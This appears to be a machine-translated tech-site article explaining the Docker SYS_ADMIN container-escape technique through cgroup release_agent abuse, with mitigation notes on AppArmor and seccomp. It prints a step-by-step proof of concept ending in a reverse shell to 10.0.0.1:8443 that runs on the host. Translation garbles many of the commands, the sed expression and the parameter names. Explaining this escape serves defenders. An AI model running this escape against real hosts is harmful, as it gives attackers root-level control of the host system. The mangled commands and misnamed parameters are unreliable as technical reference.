Example Analysis of Escape principle of Docker SYS_ADMIN Container 07/06 Update SLTechnology News&Howtos

Example Analysis of Escape principle of Docker SYS_ADMIN Container

2025-07-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article mainly explains "the example analysis of the escape principle of Docker SYS_ADMIN container". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Next let the editor to take you to learn the "Docker SYS_ADMIN container escape principle example analysis"!

Preface

The insecure configuration of the Docker container may lead to a container escape vulnerability in the application. This article will introduce in detail the principle of container escape using SYS_ADMIN Capability.

Unlike virtual machines, the Docker container shares the host operating system kernel. Hosts and containers are isolated by kernel namespace (namespaces), kernel Capabilities, CGroups (control groups) and other technologies.

After version 2.2, the Linux kernel subdivides root permissions into units called Capability. For example, in the Docker container, you may need to bind Web server to a port with a value less than 1024, and the Capability required for this operation is "CAP_NET_BIND_SERVICE". If you grant this Capability to the user executing Web server, then when binding the port, Web server does not need to run as the root user.

In most cases, processes in the container do not need to be run as "full" root users. Docker only grants a few default Capabilities to the root account in the container, and others are disabled. This means that the root user rights in the container are much smaller than the real root user rights on the host.

In the actual use process, many users will violate these security configuration principles of Docker. For example, for convenience, the container starts with the root user, and in order to perform some privileged operations, the root user is granted some additional Capability, such as SYS_ADMIN.

If a Docker container starts in a manner that satisfies the following conditions, an attacker can escape to the host in the container.

Run in the container as the root user

Container enables SYS_ADMIN Capability

The container does not enable Docker's default AppArmor profile docker-default, or AppArmor allows mount syscall to run

Among them, conditions 1 and 2 are required, while condition 3 is relatively easy to meet on some host machines, such as Red Hat Linux operating systems such as CentOS. AppArmor is not installed by default.

For example, open a Ubuntu container with the following command:

Docker run-rm-it-cap-add=SYS_ADMIN-security-opt apparmor=unconfined ubuntu bash

Where "--cap-add=SYS_ADMIN" represents the Capability to the Docker container SYS_ADMIN. "--security-opt apparmor=unconfined" means to remove the default AppArmor configuration of Docker.

An attacker can escape the container by mounting the host cgroup in the container and using the characteristics of cgroup notify_on_release to execute shell on the host. The steps are as follows:

Mount the host cgroup in the container, and customize a cgroup

Mkdir / tmp/cgrp & & mount-t cgroup-o memory cgroup / tmp/cgrp & & mkdir / tmp/cgrp/x

Configure the notify_no_release and release_agent of the cgroup

Echo 1 > / tmp/cgrp/x/notify_on_releasehost_path= `sed-n's dev/tcp/10.0.0.1/8443. *\ perdir=\ ([^,] *\). * /\ 1Charger p' / etc/ mtab`echo "$host_path/cmd" > / tmp/cgrp/release_agentecho'#! / bin/sh' > / cmdecho "sh-I > & / dev/tcp/10.0.0.1/8443 0 > & 1" > / cmdchmod axix / cmd

Here you use sh tcp's bounce shell to escape the container, and you can execute any other linux shell command.

Triggers release_agent execution.

Sh-c "echo\ $\ $> / tmp/cgrp/x/cgroup.procs"

The operation and principle of each step are described in detail below.

0x01 mounts the host cgroup

The first step in exploitation is to mount the memory cgroup of the host.

Cgroup (control group, control group) is a function of Linux kernel to allocate resources (such as CPU time, system memory, network bandwidth or a combination of these resources). Use the mount-t cgroup command to view the current cgroup of the host.

Go to the memory cgroup to be mounted.

This folder contains the system administrator's configuration of memory resources, where the docker folder contains docker's default cgroup configuration for container memory resources.

0x011 Container cgroup

By default, the container generates a subdirectory named container ID in the docker subdirectory of each subsystem directory of the / sys/fs/cgroup directory when it starts.

If you look at the memory cgroup directory in the host, you can see that there is an additional directory 9d14bc4987d5807f691b988464e167653603b13faf805a559c8a08cb36e3251a in the docker directory. This string of characters is the container ID, and the contents in this directory are the contents of the user viewing / sys/fs/cgroup/memory in the container.

0x012 mount system call

The mount command is a system call (syscall) command with the system call number 165. Performing syscall requires the user to have a Capability for CAP_SYS_ADMIN.

If the-- cap-add SYS_ADMIN parameter is added when the host starts, then root users can perform mount mount cgroup inside the container. (docker does not turn on SYS_ADMIN Capability by default)

Mount cgroup in 0x013 container

The first step in exploiting the vulnerability is to create a temporary directory / tmp/cgrp in the container and use the mount command to remount the system's default memory type cgroup on / tmp/cgrp.

Mkdir / tmp/cgrp & & mount-t cgroup-o memory cgroup / tmp/cgrp

Where the-t parameter indicates that the category of mount is cgroup,-o indicates the mount option. For cgroup, the mount option is cgroup's subsystem, and each subsystem represents a resource type, such as cpu, memory. For details, please refer to the link: cgroup subsystems.

After executing this command, the host's memory cgroup is mounted into the container, corresponding to the directory / tmp/cgrp.

It is important to note that when the cgroup is remounted, it will succeed only if the hierarchy of the mounted target is empty. Therefore, if the remount of the memory here is not successful, you can switch to another subsystem.

The next step is to create a subdirectory x in this cgroup type.

Mkdir / tmp/cgrp/x

If you look at / tmp/cgrp/x, you can see that there are many configurations related to memory.

Next, you will use x as the primary target of the POC operation.

0x02 notify_no_release

The second step in exploitation is related to notify_no_release. Each subsystem of cgroup has a parameter notify_on_release, which is Boolean, 1 or 0. Instructions to release agents can be started and disabled, respectively. If notify_on_release is enabled, when cgroup no longer contains any tasks (that is, when the PID in cgroup's tasks file is empty), the system kernel executes the contents of the file specified by the release_agent parameter.

It is important to note that the release_agent file is not in the / tmp/cgrp/x directory, but in the root directory / tmp/cgrp of memory cgroup. This design can be used to automatically remove all empty cgroup in the root cgroup.

Set the notify_no_release property of / tmp/cgrp/x to 1.

Echo 1 > / tmp/cgrp/x/notify_no_release

Then specify release_agent as the cmd file of the container on the host. The specific operation is to obtain the storage path of the docker container on the host.

Host_path= `sed-n'Unip. *\ perdir=\ ([^,] *\). * /\ 1Uniple p' / etc/ mtab`

The file / etc/mtab stores the file system actually mounted in the container.

Here we use the sed command to match the non-comma content between perdir= (and). As you can see from the figure above, host_path is the writable directory upperdir on docker's overlay storage driver.

Create a cmd file in this directory and use it as the file specified by the / tmp/cgrp/x/release_agent parameter.

Echo "$host_path/cmd" > / tmp/cgrp/release_agent0x03 container escape

Next, the shell that POC will execute is written to the cmd file and the execution permission is given.

Echo'#! / bin/sh' > / cmdecho "sh-I > & / dev/tcp/10.0.0.1/8443 0 > & 1" > > / cmdchmod axix / cmd

Finally, POC triggers the host to execute the shell in the cmd file.

Sh-c "echo\ $\ $> / tmp/cgrp/x/cgroup.procs"

This command starts a sh process and writes the PID of the sh process to / tmp/cgrp/x/cgroup.procs, where\ $\ $represents the PID of the sh process.

After executing sh-c, the sh process automatically exits, so that cgroup / tmp/cgrp/x no longer contains any tasks, and the shell in the / tmp/cgrp/release_agent file will be executed by the operating system kernel.

0x04 AppArmor and seccomp

The key to escaping the Docker container with SYS_ADMIN permissions is that the container should be able to mount the cgroup of the host. In order to prohibit container from executing mount syscall,Docker, on the basis of restricting user Capabilities, two security protection tools, AppArmor and seccomp, are enabled by default. However, with regard to the configuration of these two tools, there are some noticeable "flaws" in the default configuration given by Docker.

0x041 AppArmor

AppArmor is not installed by default on the Linux operating system of Red Hat such as AppArmor,CentOS. In this way, the vulnerability condition No. 3 mentioned at the beginning of the article, "the container must not enable Docker's default AppArmor profile docker-default, or AppArmor allows mount syscall to run", will be easy to meet and do not need to explicitly add the "--security-opt apparmor=unconfined" parameter.

AppArmor (Application Armor) is a security module of the Linux kernel. AppArmor allows system administrators to associate each program with a security profile, thus limiting the functionality of the program. To put it simply, AppArmor is an access control system similar to SELinux, through which users can specify which files the program can read, write or run, whether it can open network ports, and so on.

For example, the Docker website gives an example of Nginx reinforcement.

Profile docker-nginx flags= (attach_disconnected,mediate_deleted) {# include... Deny / bin/** wl, deny / boot/** wl, deny / dev/** wl, deny / etc/** wl, deny / home/** wl,...

Where deny / bin/** wl means to block write permissions under the / bin directory and any layer subdirectory, w: write, l: create hard links.

The default profile adopted by Docker is docker-default. It is moderately protective and provides wide application compatibility. Looking at the configuration file generation template, you can see that the container is not allowed to call mount in line 43.

... Deny mount, deny / sys/ [^ f] * / * * wklx, deny / sys/f [^ s] * / * * wklx, deny / sys/fs/ [^ c] * / * * wklx, deny / sys/fs/c [^ g] * / * * wklx, deny / sys/fs/cg [^ r] * / * * wklx,...

You can also find that the configuration file does not prohibit reading and writing to the / sys/fs/cgroup directory. If you find that the cgroup directory cannot be read or written in the container during the actual use, you can check whether the container forbids reading and writing to the cgroup directory in the AppArmor configuration.

Docker starts the container by default using the docker-default policy. At this point, even if the container is run using SYS_ADMIN Capbility, it will prevent the container from performing mount system calls. Unless you override the configuration with the parameter-- security-opt apparmor=unconfined, when the container starts.

Although Docker's default AppArmor configuration does a good job of preventing containers from calling mount, not all hosts support AppArmor. For Debian linux, such as Ubuntu, AppArmor and SeLinux are installed by default. For Red hat linux, such as CentOS, SeLinux is used by default and AppArmor is not installed. This makes it possible to perform mount system calls on Red hat linux hosts without the need for container-enabled-- the security-opt apparmor=unconfined parameter. Test on a CentOS tester, and the results are as follows:

If you look at docker info, you can see that AppArmor is not enabled in the security option "Security Options", only seccomp. Therefore, the CentOS host can still execute POC successfully with the addition of only the "--cap-add=SYS_ADMIN" parameter.

0x042 seccomp

From the docker info output in the previous section, you can see that Docker also has a default seccomp configuration. Then why didn't seccomp prevent the container from calling mount?

This starts with the default seccomp configuration of Docker. In the configuration template, the configuration of mount starts at line 600.

{"names": ["bpf", "clone", "fanotify_init", "fsconfig", "fsmount" "fsopen", "fspick", "lookup_dcookie", "mount", "move_mount", "name_to_handle_at" "open_tree", "perf_event_open", "quotactl", "setdomainname", "sethostname", "setns" "syslog", "umount", "umount2", "unshare"], "action": "SCMP_ACT_ALLOW" "args": [], "comment": " "includes": {"caps": ["CAP_SYS_ADMIN"]}, "excludes": {}}

As you can see, the default configuration of Docker seccomp relies only on SYS_ADMIN to restrict the execution of mount system calls. If the container starts with the "--cap-add=SYS_ADMIN" parameter, then seccomp does not protect the container very well.

At this point, I believe that everyone on the "Docker SYS_ADMIN container escape principle example analysis" have a deeper understanding, might as well to the actual operation of it! Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.